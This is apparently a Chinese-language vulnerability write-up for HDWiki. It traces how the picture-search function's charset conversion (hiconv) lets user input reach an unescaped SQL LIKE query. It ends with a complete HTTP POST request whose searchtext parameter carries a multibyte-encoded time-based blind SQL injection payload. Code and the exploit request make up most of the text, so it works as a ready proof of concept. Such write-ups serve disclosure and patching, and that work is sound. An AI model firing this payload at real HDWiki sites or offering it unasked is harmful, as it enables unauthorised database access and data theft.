hdwiki gbk注入

在control/pic.php文件中，doseach方法中

function dosearch(){         $num = 16;         $page=isset($this->get[3])? intval($this->get[3]) :'';         if(empty($page) || !is_numeric($page)){             $page=1;         ……         $searchtext=isset($this->post['searchtext'])?$this->post['searchtext']:string::haddslashes(urldecode($this->get[2]),1);         $searchtext= string::hiconv(trim($searchtext));         if(empty($searchtext)){             $this->message($this->view->lang['pic_no_title'],'BACK',0);         }                   $start_limit = ($page - 1) * $num;         $count=$_ENV['pic']->search_pic_num($searchtext);         $piclist=$_ENV['pic']->search_pic($searchtext,$start_limit,$num);

$searchtext由hiconv方法进行处理

 function hiconv($str,$to='',$from='',$force=false) {         ……         //$isutf8=preg_match( '/^([/x00-/x7f]|[/xc0-/xdf][/x80-/xbf]|[/xe0-/xef][/x80-/xbf]{2}|[/xf0-/xf7][/x80-/xbf]{3})+$/', $str );         $re = strlen($str) > 6 ? '/([/xe0-/xef][/x80-/xbf]{2}){2}/' : '/[/xe0-/xef][/x80-/xbf]{2}/';         $isutf8 = preg_match($re, $str);           //$force = (substr($to, 0, 3) == 'utf') ? true : $force;           if(!$force && $isutf8 && $to=='utf-8' ) return $str;         if(!$force && !$isutf8 && $to=='gbk' ) return $str;           if (function_exists('iconv')){             $str = iconv($from, $to, $str);         }else{             require_once(HDWIKI_ROOT.'/lib/Chinese.class.php');             $ch = new chinese($from,$to);             if('utf-8'==$from){                 $str = addslashes($ch->convert(stripslashes($str)));             }else{                 $str = $ch->convert($str);             }         }         return $str;     }

从这里可以得知至少有两个三个字节的字符
然后进入search_pic_num函数

function search_pic_num($keyword){         $sql="SELECT count(*) num FROM ".DB_TABLEPRE."attachment p LEFT JOIN ".DB_TABLEPRE."doc d ON p.did=d.did WHERE p.isimage=1 AND d.title LIKE '%$keyword%' OR p.description LIKE '%$keyword%' ORDER BY p.time DESC";         var_dump($sql);                 return $this->db->result_first($sql);     }

POST /hdwiki/index.php?pic-search HTTP/1.1 Host: localhost Content-Length: 110 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://localhost User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://localhost/hdwiki/index.php?pic-piclist-2 Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: hd_searchtime=1438309655; hd_sid=EXEY4N; hd_auth=1696Q4sf05UXNEw7ABXrLshePnDPehWzA5SGM3eI0UKFbre6fyfBDNwmYk6yynUCS%2BJa4XRpQFUhSWxX1jcL    searchtext=%E7%9B%B8%e9%8c%a6'  UNION SELECT if(user()=user(),sleep(1),1)#&searchfull=%CD%BC%C6%AC%CB%D1%CB%F7